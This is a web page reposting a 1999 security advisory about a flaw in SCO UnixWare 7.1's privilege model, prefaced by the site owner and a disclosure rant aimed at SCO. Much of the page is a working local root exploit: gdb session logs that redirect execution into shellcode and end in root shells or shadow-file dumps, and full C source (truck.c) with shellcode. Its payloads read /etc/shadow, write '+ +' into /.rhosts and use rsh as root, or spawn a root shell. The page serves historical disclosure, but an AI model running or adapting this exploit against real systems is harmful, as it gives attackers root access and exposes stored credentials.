APLawrence - Information and Resources for Unix and Linux Systems, Bloggers and the self-employed
Fundamental flaw in UnixWare 7 security
This is a detailed example of a security flaw that was found in the original UnixWare 7.

I assume this has been long fixed, but note the frustration from SCO's "not to worry" reaction.



From: Vacuum [mailto:vacuum@technotronic.com]
Sent: Friday, December 10, 1999 2:35 PM
Subject: Fundamental flaw in UnixWare 7 security


Greetings,

OVERVIEW
A flaw in SCO UnixWare's security model will allow any user to gain root, read
system files, etc.


RANT
I'm sure many of you are wondering what the response from the people from
SCO has been regarding all of these UnixWare problems.  Nil.  First, a little
background.  Back when I began my UnixWare audit with the dos7utils exploit,
I was contacted and asked to please submit any bugs I find to the UnixWare
security team.  Of course I had no problem with this, since my goal is
supposedly the same as theirs: to secure UnixWare.  I immediately submitted
my su and uidadmin exploits and told them about the gethostbyname() overflow.
I was told that these were "known" bugs (known, evidently, to SCO only) and
nothing more.

I foolishly assumed that this meant they were working on a fix but did not
have one ready.  It turns out that what they meant by this was "We have a
fix ready, but we are going to sit on it until it becomes public."  SCO had
completely abused my decision to submit to them then wait for a fix.  Anyone
notice how quickly they got out the gethostbyname(), su and uidadmin fixes
but have yet to fix the other problems I've found but didn't tell them about? 
Chances are excellent that if I had never posted these exploits, crackers
would've continued exploiting UnixWare until SCO silently fixed the problems
in 7.2.  

Wake up, SCO!  The underground cracker community is already exploiting all
the problems I'm finding!  You're only hurting your customers by waiting until
the next release, or until someone posts publicly.  Take a proactive stance on
security by finding problems internally (or with the help of people like me)
and then tell the world at large.  To assume that you 
and I are the only ones capable of finding these holes is an insult to your
customers.

I've yet to receive a word from SCO about my recent slew of exploits.  My
guess is that they were just happy to buy a few months of time before I
started posting.


BACKGROUND
Please read my "uidadmin + discussion" advisory for more information about
UnixWare's privileged process system.  The techniques discussed herein have
only been tested on SCO UnixWare 7.1.  While earlier versions of UW are
probably affected, SCO OpenServer does not use this particular security
model and is therefore not affected.

DETAILS
As Aleph One put it, in his response to my Vuln-Dev post:

...
SCO has implemented privileges in UnixWare without thinking of possible
interaction with other subsystems. They should have placed the same
restriction on application running with privileges as those placed on
applications running suid or sgid. I am surprised no one before noticed
this.  It's a hole you could drive a truck through. The engineers that coded
the privilege system (a security subsystem!) should get a good ass chewing
or get fired.
...

Indeed this is true.  This security subsystem *itself*, not the programs
encompassed by it, has caused more compromises than all the problems I found
in the suid/sgids.  Consider that a privileged program which is simply

#include <stdio.h>

int main(void) {
    printf("sekure\n");
    return 0;
}

can be compromised just as readily as one which is 10000 lines of spaghetti
code.  The specific problem lies in the fact that any user who runs one of these
privileged processes (that are not suid/sgid, but are in
/etc/security/tcb/privs) has full control over the process.  By 
using a debugger, we can stop the program, insert registers and control
program flow.  Any program in the privs file which is not also suid/sgid is
vulnerable to this exploit, regardless of whatever overflows and symlink
vulnerabilities may or may not exist.

EXPLOIT

The exploit goes like this:
- Put nops+shellcode into your environment
- load a program which gains privs in /etc/security/tcb/privs with gdb
- set a breakpoint at _init
- run, and when we hit that breakpoint change our eip to point into our environment
- continue, continue, rootshell

Get GDB for UnixWare binaries from ftp.freebird.org

Thanks to the teso folks for their suggestions.

----- DACREAD -----
bash-2.02$ ./truck 1

UnixWare 7.1 security model exploit
Brock Tellier btellier@usa.net

$ ./gdb /usr/ucb/w
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (unixware2), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) break _init
Breakpoint 1 at 0x804ac34
(gdb) run
Starting program: /usr/ucb/w 

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 3257]
warning: shared library handler failed to enable breakpoint

Breakpoint 1, 0x804ac34 in _init ()
(gdb) disassemble
Dump of assembler code for function _init:
0x804ac34 <_init>:      ret    
End of assembler dump.
(gdb) info registers
eax            0x0      0
ecx            0x8      8
edx            0x804ac38        134523960
ebx            0x804644c        134505548
esp            0x804643c        134505532
ebp            0x8046440        134505536
esi            0x804bc3c        134528060
edi            0x8046454        134505556
eip            0x804ac34        134523956
eflags         0x100212 1049106
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x0      0
(gdb) set $eip = 0x8046b75
(gdb) continue
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0xbff99a40 in errno ()
(gdb) continue
Continuing.
root:bahbapXFxhypF:10935::::::
daemon:NP:6445::::::
bin:NP:6445::::::
....
Program exited normally.
(gdb) 

---- DACWRITE ----
bash-2.02$ ./truck 2

UnixWare 7.1 security model exploit
Brock Tellier btellier@usa.net

$ ./gdb /usr/bin/getdev
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (unixware2), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) break _init
Breakpoint 1 at 0x830e740
(gdb) run
Starting program: /usr/bin/getdev 

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 3271]
warning: shared library handler failed to enable breakpoint

Breakpoint 1, 0x830e740 in _init ()
(gdb) disassembe
Undefined command: "disassembe".  Try "help".
(gdb) disassemble
Dump of assembler code for function _init:
0x830e740 <_init>:      ret    
End of assembler dump.
(gdb) set $eip = 0x8046b75
(gdb) continue
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0xbff99a40 in errno ()
(gdb) continue
Continuing.
# id
uid=0(root) gid=3(sys)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
#

---- SETUID ----
bash-2.02$ ./truck 3

UnixWare 7.1 security model exploit
Brock Tellier btellier@usa.net

$ ./gdb /usr/ucb/lpr
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (unixware2), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) break _init
Breakpoint 1 at 0x805036c
(gdb) run
Starting program: /usr/ucb/lpr 

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 3302]
warning: shared library handler failed to enable breakpoint

Breakpoint 1, 0x805036c in _init ()
(gdb) disassemble
Dump of assembler code for function _init:
0x805036c <_init>:      ret    
End of assembler dump.
(gdb) set $eip = 0x8046b75
(gdb) continue
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0xbff99a40 in errno ()
(gdb) continue
Continuing.
# id
uid=0(root) gid=1(other)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
#

--- truck.c ---
/** 
 ** "Its a hole you could drive a truck through." 
 **                        -Aleph One
 **
 ** truck.c UnixWare 7.1 security model exploit
 ** Demonstrates how we own privileged processes 
 ** 
 ** Usage: cc -o truck truck.c
 ** ./truck <filetype>  where filetype is 1, 2 or 3 
 ** (for dacread, dacwrite and setuid, respectively)
 **
 ** This will put $XNEC in the environment and run a shell.
 ** From there you must use gdb/debug to load a file of the
 ** type you chose (by checking /etc/security/tcb/privs)
 ** and setting a breakpoint at _init via "break _init".
 ** When you "run" and break at _init, change your EIP
 ** to something between 0x8046000 and 0x8048000 with 
 ** "set $eip = 0x8046b75" and "continue" twice.
 **
 **
 ** Brock Tellier btellier@usa.net
 **/ 


#include <stdlib.h>
#include <stdio.h>
#include <string.h>   /* memset, memcpy, strlen */

char scoshell[]= /* This isn't a buffer overflow! really! */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/sm\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

                       
#define LEN 3500
#define NOP 0x90

#define DACWRITE "void main() { system(\"echo + + > /.rhosts; chmod 700 \
/.rhosts; chown root:sys /.rhosts; rsh -l root localhost sh -i \
\"); }\n"
#define DACREAD  "void main() { system(\"cat /etc/shadow\");}\n"
#define SETUID  "void main() { setreuid(0,0);system(\"/bin/sh\"); }\n"

void usage(int ftype) {
    fprintf(stderr, "Error: Usage: truck [filetype]\n");
    fprintf(stderr, "Where filetype is one of the following: \n");
    fprintf(stderr, "1 dacread\n2 dacwrite\n3 setuid\n");
    fprintf(stderr, "Note: if file has allprivs, use setuid\n");
}
void buildsm(int ftype) {
  FILE *fp;
  char cc[100];
  fp = fopen("/tmp/sm.c", "w");

  if (ftype == 1) fprintf(fp, DACREAD);
    else if(ftype == 2) fprintf(fp, DACWRITE);
    else if(ftype == 3) fprintf(fp, SETUID);

  fclose(fp);
  snprintf(cc, sizeof(cc), "cc -o /tmp/sm /tmp/sm.c");
  system(cc);

}

int main(int argc, char *argv[]) {

int buflen = LEN;
char buf[LEN];        /* becomes the XNEC environment variable */
int filetype = 0;

 if(argc > 2 || argc == 1) {
    usage(filetype);
    exit(0); 
 }

 if ( argc > 1 ) filetype=atoi(argv[1]);
 if ( filetype > 3 || filetype < 1 ) { usage(filetype); exit(-1); }
 buildsm(filetype);

fprintf(stderr, "\nUnixWare 7.1 security model exploit\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");

/* Fill the buffer with NOPs and place the shellcode at its end */
memset(buf,NOP,buflen);
memcpy(buf+(buflen - strlen(scoshell) - 1),scoshell,strlen(scoshell));

/* Prefix the variable name and terminate the string before exporting it */
memcpy(buf, "XNEC=", 5);
buf[buflen - 1] = 0;
putenv(buf);

system("/bin/sh");
exit(0);
}
------

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier@usa.net